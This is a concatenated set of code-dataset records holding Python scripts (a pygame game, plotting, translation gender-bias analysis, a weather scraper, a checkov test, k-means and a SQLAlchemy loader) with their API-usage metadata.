"call"}, {"api_name": "os.path", "line_number": 76, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 77, "usage_type": "call"}, {"api_name": "os.path", "line_number": 77, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 79, "usage_type": "call"}, {"api_name": "os.path", "line_number": 79, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 80, "usage_type": "call"}, {"api_name": "os.path", "line_number": 80, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 91, "usage_type": "call"}, {"api_name": "os.path", "line_number": 91, "usage_type": "attribute"}, {"api_name": "spacy.cli.download", "line_number": 94, "usage_type": "call"}, {"api_name": "spacy.cli", "line_number": 94, "usage_type": "attribute"}, {"api_name": "nltk.download", "line_number": 95, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 98, "usage_type": "call"}, {"api_name": "fastText.load_model", "line_number": 105, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 107, "usage_type": "attribute"}, {"api_name": "nltk.download", "line_number": 116, "usage_type": "call"}, {"api_name": "multiprocessing.Queue", "line_number": 121, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 134, "usage_type": "call"}, {"api_name": "os.path", "line_number": 134, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 138, "usage_type": "call"}, {"api_name": "os.path", "line_number": 138, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 140, "usage_type": "call"}, {"api_name": "os.path", "line_number": 140, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 142, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 147, "usage_type": "attribute"}, {"api_name": "multiprocessing.Queue", "line_number": 150, "usage_type": "attribute"}, {"api_name": "logging.Logger", "line_number": 151, "usage_type": "attribute"}, {"api_name": "queue.Empty", "line_number": 162, "usage_type": "attribute"}]} +{"seq_id": "546135029", "text": "import pygame\nfrom pygame.sprite import Sprite\n\nclass Bullet(Sprite):\n \"\"\" A Class to manage bullets fired from the rocket\"\"\"\n\n def __init__(self, ai_settings, screen, rocket):\n \"\"\" Create a bullet object at the ship's current position\"\"\"\n # Inherit the __init__ function from the Spirte parent class\n super().__init__()\n self.screen = screen\n\n # Create a bullet rect at (0,0) and then set correct position\n self.rect = pygame.Rect(0,0, ai_settings.bullet_width,\n ai_settings.bullet_height)\n self.rect.centery = rocket.center\n self.rect.centerx = rocket.rect.right\n\n\n # Store the bullets position as a decimal value\n self.x = float(self.rect.x)\n\n self.color = ai_settings.bullet_color\n self.speed_factor = ai_settings.bullet_speed_factor\n\n def update(self):\n \"\"\"Move the bullet across the sreen.\"\"\"\n self.x += self.speed_factor\n # Update the rect position\n self.rect.x = self.x\n\n def draw_bullet(self):\n \"\"\" Draw the bullet to the screen\"\"\"\n pygame.draw.rect(self.screen, self.color, self.rect)", "sub_path": "exercises/12-5.Sideways_Shooter/bullet.py", "file_name": "bullet.py", "file_ext": "py", "file_size_in_byte": 1143, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "pygame.sprite.Sprite", "line_number": 4, "usage_type": "name"}, {"api_name": "pygame.Rect", "line_number": 14, "usage_type": "call"}, {"api_name": "pygame.draw.rect", "line_number": 34, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 34, "usage_type": "attribute"}]} +{"seq_id": "154228029", "text": "import pandas as pd\r\nimport matplotlib.pyplot as plt\r\n\r\nstar_data = pd.read_csv(\"habitable_star_data.csv\")\r\n\r\nstar_name = star_data[\"Star Name\"]\r\ndistance = star_data[\"Distance (ly)\"]\r\nmass = star_data[\"Mass (M☉)\"]\r\nradius = star_data[\"Radius (R☉)\"]\r\ngravity = star_data[\"Surface Gravity (m/s²)\"]\r\n\r\nplt.figure()\r\nplt.bar(star_name, mass)\r\nplt.xlabel(\"Star Names\")\r\nplt.ylabel(\"Mass of Stars\")\r\nplt.title(\"Star Name vs Mass\")\r\nplt.xticks(rotation = 90)\r\n\r\nplt.figure()\r\nplt.bar(star_name, radius)\r\nplt.xlabel(\"Star Names\")\r\nplt.ylabel(\"Radius of Stars\")\r\nplt.title(\"Star Name vs Radius\")\r\nplt.xticks(rotation = 90)\r\n\r\nplt.figure()\r\nplt.bar(star_name, distance)\r\nplt.xlabel(\"Star Names\")\r\nplt.ylabel(\"Distance of Stars\")\r\nplt.title(\"Star Name vs Distance\")\r\nplt.xticks(rotation = 90)\r\n\r\nplt.figure()\r\nplt.bar(star_name, gravity)\r\nplt.xlabel(\"Star Names\")\r\nplt.ylabel(\"Gravity of Stars\")\r\nplt.title(\"Star Name vs Gravity\")\r\nplt.xticks(rotation = 90)\r\n\r\nplt.show()", "sub_path": "charts.py", "file_name": "charts.py", "file_ext": "py", "file_size_in_byte": 966, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "pandas.read_csv", "line_number": 4, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 12, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 13, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 13, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 14, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 15, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 16, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 16, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 19, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 20, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 21, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 22, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 23, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 24, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 24, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 26, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 27, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 29, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 34, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 35, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 37, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name"}]} +{"seq_id": "269368203", "text": "# This code is a modified version of https://github.com/marceloprates/Gender-\n# Bias/blob/master/gender-bias.py. Currently, the code has been modified to\n# remove all sections related to adjective translation and update occupation\n# sections to fields of study (FOS). It was last modified on 10/13/19 by \n# Katy Mitchell, (kmitch64@uncc.edu) for ITCS 5111: Introduction to Natural \n# Language Processing\n\n\nimport sys\nfrom googletrans import Translator\nfrom googletrans import LANGUAGES\nfrom xpinyin import Pinyin\nimport csv\nimport numpy as np\n\n\n# Define function to obtain the translated gender of a field of study (FOS) in a given language (through Google Translate)\ndef get_gender(language, fos=None, case=None):\n\n field_of_study_dict = dict()\n field_of_study_dict['Malay'] = 'dia adalah %s' #change to education\n field_of_study_dict['Estonian'] = 'ta on %s' #change to education\n field_of_study_dict['Swahili'] = 'yeye ni %s' #change to education\n if fos is not None:\n phrase = field_of_study_dict[language] % fos\n else:\n raise Exception(\"Field of study has not been provided\")\n # end if\n\n try:\n translation = translator.translate(phrase, src=language, dest='en').text\n translation = translation.lower()\n print(\"Language: {} | Phrase: {} | Translation: {}\".format(language, phrase, translation))\n \n female_markers = [\"she\", \"she's\", \"her\"]\n male_markers = [\"he\", \"he's\", \"his\"]\n neuter_markers = [\"it\", \"it's\", \"its\", \"they\", \"they're\", \"them\", \"who\", \"this\", \"that\"]\n \n has_any = lambda markers, translation: any([ marker.lower() in translation.lower().split() for marker in markers ])\n\n if(has_any(female_markers, translation) or translation[0:10].find(\"that woman\") != -1):\n return 'Female' # Suggestion: (1,0,0)\n elif(has_any(male_markers, translation) or translation[0:8].find(\"that man\") != -1):\n return 'Male' # Suggestion: (0,1,0)\n elif(has_any(neuter_markers, translation)):\n return 'Neutral' # Suggestion: (0,0,1)\n else:\n return '?'\n except:\n return '?'\n # end try\n# end def\n\n\ntranslator = Translator()\np = Pinyin()\n\ndo_fos = \"fos\" in sys.argv\n\n# Get language list\nlanguages = []\nwith open('/Users/katymitchell/Documents/GitHub/Gender-Bias/languages.csv', 'r') as f:\n f.readline()\n for line in f:\n language, family, pronomial_gender_system, supported = line.split(\";\")\n if(pronomial_gender_system != 'Yes' and supported.rstrip() == 'Yes'):\n languages.append(language)\n# end with\n\n# The remainder of this code needs to be modified to use NCES files\nif do_fos:\n # Read FOS list into table\n fos_table = np.array(list(csv.reader(open('jobs/bureau_of_labor_statistics_profession_list_gender_filtered_expanded.tsv', 'r'), delimiter='\\t')))\n # Compute list of categories\n categories = list(set(fos_table[1:, -3]))\n # Get dictionary of category -> jobs (jobs per category)\n categories_dict = dict([ (category, fos_table[fos_table[:, -3] == category, 0]) for category in categories ])\n# end if\n\n\"\"\"\n Create a fos_table with the translated version (provided by Google Translate) of each field of study,\n in the following structure:\n 1. Each line corresponds to a single FOS\n 2. The following 3 columns give a translated version of that FOS for each of the three languages\n\"\"\"\nif False and do_fos:\n with open(\"Results/jobs-translations.tsv\", \"w\") as output:\n \n # Write header\n # First column is category\n output.write(\"Category\")\n # Then follows one column per language\n output.write(\"\\tEnglish\")\n for language in languages:\n output.write('\\t' + language)\n # end for\n output.write('\\n')\n\n# need to modify to use without categories\n\n # Now iterate over all categories\n for category in categories:\n print(\"Translating occupations from category {} ...\".format(category))\n # Get all jobs for this category\n for fos in categories_dict[category]:\n print(\"\\tTranslating occupation \\\"{}\\\" ...\".format(fos))\n output.write(category)\n output.write('\\t' + fos)\n # For each language L in our list, translate 'job' from English to L\n for language in languages:\n try:\n translated_fos = (translator.translate(fos.rstrip().lower(), src='en', dest=language).text).lower()\n except Exception:\n print(\"\\tCould not translate FOS %s to language %s\" % (fos.rstrip(), language))\n translated_fos = \"?\"\n # end try\n output.write('\\t' + translated_fos)\n # end for\n output.write('\\n')\n # end for\n # end for\n # end with\n# end if\n\n\"\"\"\n Now create\n\"\"\"\n\nif do_fos:\n # Get table with one FOS for row, translated to every language (one per column)\n translated_fos = list(csv.reader(open('Results/jobs-translations.tsv', 'r'), delimiter='\\t'))\n with open('Results/job-genders.tsv', 'w') as output:\n # Write header\n output.write(\"Category\")\n output.write(\"\\tField of Study\")\n for language in languages:\n output.write('\\t' + language)\n # end for\n output.write('\\n')\n\n for entry in translated_fos[1:]:\n \n category = entry[0]\n english_name = entry[1]\n foreign_names = entry[2:]\n\n print(\"Translating field of study \\\"{}\\\" ...\".format(english_name))\n\n output.write(category)\n output.write('\\t' + english_name)\n\n for (language, foreign_name) in zip(languages, foreign_names):\n gender = get_gender(language, occupation=foreign_name)\n output.write('\\t%s' % gender)\n # end if\n # end if\n # end for\n\n output.write('\\n')\n output.flush()\n # end for\n # end with\n# end if\n", "sub_path": "gender-bias.py", "file_name": "gender-bias.py", "file_ext": "py", "file_size_in_byte": 6134, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "googletrans.Translator", "line_number": 55, "usage_type": "call"}, {"api_name": "xpinyin.Pinyin", "line_number": 56, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 58, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 73, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 73, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 131, "usage_type": "call"}]} +{"seq_id": "247083170", "text": "from bs4 import BeautifulSoup\nimport requests\nfrom weather_crawler import mysqlConn\n\n\ndef scrape_past(city_code):\n print(\"【数据源】:https://weather.com/zh-CN/weather/monthly/l/CHXX\" + city_code + \":1:CH\")\n print(\"--获取数据源...\")\n # 数据源\n source = requests.get('https://weather.com/zh-CN/weather/monthly/l/CHXX' + city_code + ':1:CH').text\n print(\"--数据源获取成功!\\n\")\n soup = BeautifulSoup(source, 'lxml')\n\n # 定位元素\n print(\"--定位元素中...\")\n # weather_today = soup.find('div', class_='dayCell selected')\n weather_past = soup.find_all('div', class_='dayCell opaque')\n # weather_future = soup.select('div[class=\"dayCell\"]')\n print(\"--元素定位完毕!\\n\")\n\n # 将三块信息合并到一个列表\n weather_month = []\n weather_month.extend(weather_past)\n # weather_month.append(weather_today)\n # weather_month.extend(weather_future)\n # for item in weather_month:\n # print(item.prettify())\n\n # 查询城市\n city_text = soup.find('div', class_='locations-title monthly-page-title').h1.text\n city = city_text[0:-8]\n\n # 查询日所在月份\n month_selected = soup.find('select', id='month-picker')['value']\n month = int(month_selected[6:7])\n\n # 计算表中上个月的天数\n today = int(month_selected[8:10])\n len_past_month = weather_past.__len__() - today + 1\n\n # 集合多天数据\n weather_data_past = []\n i = 0\n print(\"--多天数据融合中...\")\n for item in weather_past:\n\n # 日期\n day = item.div.text\n\n # 判断日期是否属于上个月\n if i < len_past_month:\n date = str(month-1) + \"月 \" + day + \"日\"\n else:\n date = str(month) + \"月 \" + day + \"日\"\n\n # 最高温度/最低温度\n hi = item.find('div', class_='temp hi').text\n lo = item.find('div', class_='temp low').text\n hi_lo = hi + '/' + lo\n\n # 天气描述\n description = \"/\"\n # 降雨概率\n rainfall_probability = \"/\"\n # 风力\n wind = \"/\"\n # 湿度\n humidity = \"/\"\n\n weather_data_past.append((city, date, description, hi_lo, rainfall_probability, wind, humidity))\n i += 1\n print(\"--多天数据融合完毕!\\n\")\n\n print(\"【查询城市】:\" + city)\n print(\"【查询时间】:\" + month_selected)\n print(\"【表中上月天数】:\" + str(len_past_month))\n\n # 存储数据\n print(\"\\n--数据存储中...\\n\")\n mysqlConn.save_to_mysql(weather_data_past)\n print(\"--数据存储完毕!\\n\")\n", "sub_path": "weather_crawler/scrape_weather_past.py", "file_name": "scrape_weather_past.py", "file_ext": "py", "file_size_in_byte": 2593, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "requests.get", "line_number": 10, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 12, "usage_type": "call"}, {"api_name": "weather_crawler.mysqlConn.save_to_mysql", "line_number": 80, "usage_type": "call"}, {"api_name": "weather_crawler.mysqlConn", "line_number": 80, "usage_type": "name"}]} +{"seq_id": "211181421", "text": "import os\nimport unittest\nfrom unittest.mock import patch\n\n\nclass TestRegistry(unittest.TestCase):\n\n def setUp(self):\n from checkov.terraform.checks.module.registry import module_registry\n self.registry = module_registry\n\n @patch('os.path.exists')\n def test_with_init(self, mock_path_exists):\n mock_path_exists.return_value = True\n self.assertTrue(self.registry._directory_has_init_py(\"/foo/bar\"))\n\n @patch('os.path.exists')\n def test_without_init(self, mock_path_exists):\n mock_path_exists.return_value = False\n self.assertFalse(self.registry._directory_has_init_py(\"/foo/bar\"))\n\n def test_registry_external_check_load(self):\n current_dir = os.path.dirname(os.path.realpath(__file__))\n external_dir = current_dir + \"/example_external_dir/extra_checks\"\n self.registry.load_external_checks(external_dir)\n\n external_check_loaded = False\n external_check = None\n for check in self.registry.checks['module']:\n if check.__class__.__name__ == 'ModuleCheck':\n external_check_loaded = True\n external_check = check\n self.assertTrue(external_check_loaded)\n self.registry.checks['module'].remove(external_check)\n\n\nif __name__ == '__main__':\n unittest.main()\n", "sub_path": "tests/terraform/checks/module/registry/test_registry.py", "file_name": "test_registry.py", "file_ext": "py", "file_size_in_byte": 1306, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "unittest.TestCase", "line_number": 6, "usage_type": "attribute"}, {"api_name": "checkov.terraform.checks.module.registry.module_registry", "line_number": 10, "usage_type": "name"}, {"api_name": "unittest.mock.patch", "line_number": 12, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path", "line_number": 23, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 23, "usage_type": "call"}, {"api_name": "unittest.main", "line_number": 38, "usage_type": "call"}]} +{"seq_id": "354785747", "text": "from copy import deepcopy\nimport numpy as np\nimport pandas as pd\nfrom sklearn.cluster import KMeans\nfrom matplotlib import pyplot as plt\nimport functions as func\n\n#import the dataset\n# Pandas dataframe\ndata = pd.read_csv(\"InsuranceUserData.csv\")\nprint(data.shape)\ndata.head()\nheaders = list(data.columns)\nprint(headers)\n# will depend on age range the user gives\n# NumPy representation of the Series object\nnum_prescriptions_col = data['NumPrescriptions'].values\nage_range_col = data[\"AgeRange\"].values\nprint(\"prescriptions column\")\nprint(num_prescriptions_col)\nprint(\"Age Range\")\nprint(age_range_col)\n\nplt.rcParams['figure.figsize'] = (16,9)\nplt.style.use('ggplot')\n\nX = np.array(list(zip(num_prescriptions_col, age_range_col)))\nplt.scatter(num_prescriptions_col, age_range_col, c='black', s=7)\nplt.show()\n\"\"\"\n# number of clusters\nk = 3\n# x coordinates of random centroids\nC_x = np.random.randint(0, np.max(X)-20, size=k)\n# y coordinates of random centroids\nC_y = np.random.randint(0, np.max(X)-20, size=k)\nC = np.array(list(zip(C_x, C_y)), dtype=np.float32)\nprint(C)\n\nplt.scatter(price_col, ehb_percentage_col, c='#050505', s=7)\nplt.scatter(C_x, C_y, marker='*', s=200, c='g')\nplt.show()\n\n# To store the values of centroids when it updates\nC_old = np.zeros(C.shape)\n# Cluster labels\nclusters = np.zeros(len(X))\n\n# error function - distance between new centroids and old centroids\nerror = func.dist(C, C_old, None)\n\n# Loop will run until the error becomes 0\nwhile error != 0:\n # Assigning each value to its closest cluster\n for i in range(len(X)):\n distances = func.dist(X[i], C)\n cluster = np.argmin(distances)\n clusters[i] = cluster\n # Storing the old centroid values\n C_old = deepcopy(C)\n # Finding the new centroids by taking the average value\n for i in range(k):\n points = [X[j] for j in range(len(X)) if clusters[j] == i]\n C[i] = np.mean(points, axis=0)\n error = func.dist(C, C_old, None)\n\ncolors = ['r', 'g', 'b', 'y', 'c', 'm']\nfig, ax = plt.subplots()\nfor i in range(k):\n points = np.array([X[j] for j in range(len(X)) if clusters[j] == i])\n ax.scatter(points[:, 0], points[:, 1], s=7, c=colors[i])\nax.scatter(C[:, 0], C[:, 1], marker=\"*\", s=200, c='#050505')\nplt.show() \n\"\"\"\n\n", "sub_path": "insurance_kmeans.py", "file_name": "insurance_kmeans.py", "file_ext": "py", "file_size_in_byte": 2248, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "pandas.read_csv", "line_number": 10, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 24, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 24, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.style.use", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.style", "line_number": 25, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 25, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 29, "usage_type": "name"}]} +{"seq_id": "147062313", "text": "from sqlalchemy import Column, Integer, Float, Date, String\r\nfrom sqlalchemy.ext.declarative import declarative_base\r\nfrom sqlalchemy import create_engine\r\nfrom sqlalchemy.orm import sessionmaker\r\nimport pandas as pd\r\nimport json\r\nimport re\r\nimport numpy as np\r\n\r\n\r\nBase = declarative_base()\r\n\r\nclass Movie(Base):\r\n __tablename__='Movie'\r\n Id=Column(Integer,primary_key=True,autoincrement=False)\r\n original_title=Column(String(200))\r\n poster_path=Column(String(200))\r\n def __init__(self,Id,original_title,poster_path):\r\n self.Id=Id\r\n self.original_title=original_title\r\n self.poster_path=poster_path\r\n def __repr__(self):\r\n return self.original_title\r\n\r\nclass MovieTags(Base):\r\n __tablename__='Tags'\r\n Id=Column(Integer,primary_key=True,autoincrement=False)\r\n tags=Column(String(5000))\r\n def __init__(self,Id,tags):\r\n self.Id=Id\r\n self.tags=tags\r\n\r\nclass Index(Base):\r\n __tablename__='Index_table'\r\n Numb=Column(Integer,primary_key=True,autoincrement=True)\r\n Id=Column(Integer)\r\n def __init__(self,Id):\r\n self.Id=Id\r\n def __repr__(self):\r\n print(str(Numb)+' '+str(Id))\r\n\r\nengine = create_engine('sqlite:///movie_recommendations.db')\r\nBase.metadata.create_all(engine)\r\nsession = sessionmaker()\r\nsession.configure(bind=engine)\r\ns = session()\r\n\r\nmovies=s.query(Movie).all()\r\nfor i in movies:\r\n index=Index(i.Id)\r\n s.add(index)\r\ns.commit()\r\n\r\n\r\n# df4=pd.read_csv('final.csv')\r\n# for index,row in df4.iterrows():\r\n# if pd.isnull(row['id']) or pd.isnull(row['poster_path']) or pd.isnull(row['original_title']) or (pd.isnull(row['genres']) and pd.isnull(row['keywords']) and pd.isnull(row['crew'])):\r\n# continue\r\n# movie=Movie(row['id'],row['original_title'],row['poster_path'])\r\n# tags=\"\"\r\n# if pd.isnull(row['genres'])!=True:\r\n# tags+=row['genres']\r\n# if pd.isnull(row['crew'])!=True:\r\n# tags+=row['crew']\r\n# if pd.isnull(row['keywords'])!=True:\r\n# tags+=row['keywords']\r\n# movie_tag=MovieTags(row['id'],tags)\r\n# if s.query(Movie).get(row['id']) is None:\r\n# s.add(movie)\r\n# if s.query(MovieTags).get(row['id']) is None:\r\n# s.add(movie_tag)\r\n# print(index)\r\n# s.commit()\r\n\r\n#df1=pd.read_csv('movies_metadata_processed.csv',dtype={\"id\": \"string\", \"genres\":\"string\",\"orignal_title\": \"string\", \"poster_path\":\"string\"},usecols=[\"id\",\"genres\",\"original_title\",\"poster_path\"])\r\n#df2=pd.read_csv('keywords_processed.csv',dtype={\"id\":\"string\",\"keywords\":\"string\"})\r\n\r\n#for index,row in df2.iterrows():\r\n# if pd.isnull(row['keywords'])!=True:\r\n# x=(row['keywords']).replace(\"\\\"\",\"\")\r\n# df2.at[index,'keywords']=x\r\n\r\n#df2.to_csv('keywords_processed.csv',index=False,na_rep='N/A')\r\n\r\n#df3=pd.read_csv('credits_processed.csv',dtype={\"id\":\"string\",\"crew\":\"string\"},usecols=[\"id\",\"crew\"])\r\n# for index,row in df3.iterrows():\r\n# x=re.search(\"'Director', 'name': '[a-z A-Z 0-9]*'\",row['crew'])\r\n# if x is None:\r\n# df3.at[index,'crew']=None \r\n# else:\r\n# x=x[0]\r\n# x=x.replace(',','').replace(\"\\\"\",'').replace('\\'','').replace('Director','').replace('name','').replace(':','')\r\n# x=re.sub(' +',' ',x)\r\n# df3.at[index,'crew']=x\r\n# print(x)\r\n# df3.to_csv('credits_processed.csv',index=False,na_rep='N/A')\r\n\r\n# x=(df1['genres'].tolist()[0]).replace(\"\\'name\\'\",\"\").replace(\"\\'id\\'\",\"\").replace(\"[\",\"\").replace(\"]\",\"\").replace(\"{\",\"\").replace(\"}\",\"\").replace(\":\",\"\").replace(\",\",\"\").replace(\"\\'\",\"\")\r\n# x=re.sub('[0-9]','',x)\r\n# x=re.sub(' +',' ',x)\r\n\r\n# for index,row in df1.iterrows():\r\n# x=(row['genres']).replace(\"\\'name\\'\",\"\").replace(\"\\'id\\'\",\"\").replace(\"[\",\"\").replace(\"]\",\"\").replace(\"{\",\"\").replace(\"}\",\"\").replace(\":\",\"\").replace(\",\",\"\").replace(\"\\'\",\"\")\r\n# x=re.sub('[0-9]','',x)\r\n# x=re.sub(' +',' ',x)\r\n# df1.at[index,'genres']=x\r\n# print(x)\r\n\r\n# df1.to_csv('movies_metadata_processed.csv',index=False,na_rep='N/A')\r\n# for i in x:\r\n# print(i)\r\n\r\n\r\n\r\n# (pd.concat([df1, df2, df3], axis=1,join='inner')\r\n# .to_csv('final.csv', index=False, na_rep='N/A')\r\n# )\r\n\r\n\r\n\r\n \r\n\r\n\r\n ", "sub_path": "insert.py", "file_name": "insert.py", "file_ext": "py", "file_size_in_byte": 4168, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "sqlalchemy.ext.declarative.declarative_base", "line_number": 11, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 15, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 15, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 16, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 16, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 17, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 17, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 27, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 27, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 28, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 28, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 35, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 35, "usage_type": "argument"}, {"api_name": "sqlalchemy.Column", "line_number": 36, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 36, "usage_type": "argument"}, {"api_name": "sqlalchemy.create_engine", "line_number": 42, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.sessionmaker", "line_number": 44, "usage_type": "call"}]} +{"seq_id": "87768383", "text": "import requests\nfrom multiprocessing import Pool, TimeoutError\nfrom string import printable\nimport random\nimport hashlib \nimport argparse\ncount = 1000\ndone = 0\n\nparser = argparse.ArgumentParser(description='Config the script.')\n\n\nparser.add_argument('--address', type=str, help='address to query')\nparser.add_argument('--count', type=int, help='how many hashes to break')\nparser.add_argument('--concurrency', type=int, help='how concurrently the API should be called')\nargs = parser.parse_args()\n\n\ndef invoke(val):\n global done\n done+=1\n string = ''.join(random.choices(printable, k=3))\n hsh = hashlib.md5(string.encode()).hexdigest()\n print(\"sent\" + args.address + \"/?hash=\" + hsh + \"?&start=\" + str(0) + \"&end=\" + str(1000000))\n val = requests.get(args.address + \"/?hash=\" + hsh + \"&start=\" + str(0) + \"&end=\" + str(1000000))\n print(\"processed\" + args.address + \"/?hash=\" + hsh + \"?&start=\" + str(0) + \"&end=\" + str(1000000))\n return val.text\n\n\nwith Pool(processes=args.concurrency) as pool:\n results = pool.map(invoke, range(args.count))\n print(results)\n", "sub_path": "compute.py", "file_name": "compute.py", "file_ext": "py", "file_size_in_byte": 1089, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 10, "usage_type": "call"}, {"api_name": "random.choices", "line_number": 22, "usage_type": "call"}, {"api_name": "string.printable", "line_number": 22, "usage_type": "argument"}, {"api_name": "hashlib.md5", "line_number": 23, "usage_type": "call"}, {"api_name": "string.encode", "line_number": 23, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 25, "usage_type": "call"}, {"api_name": "multiprocessing.Pool", 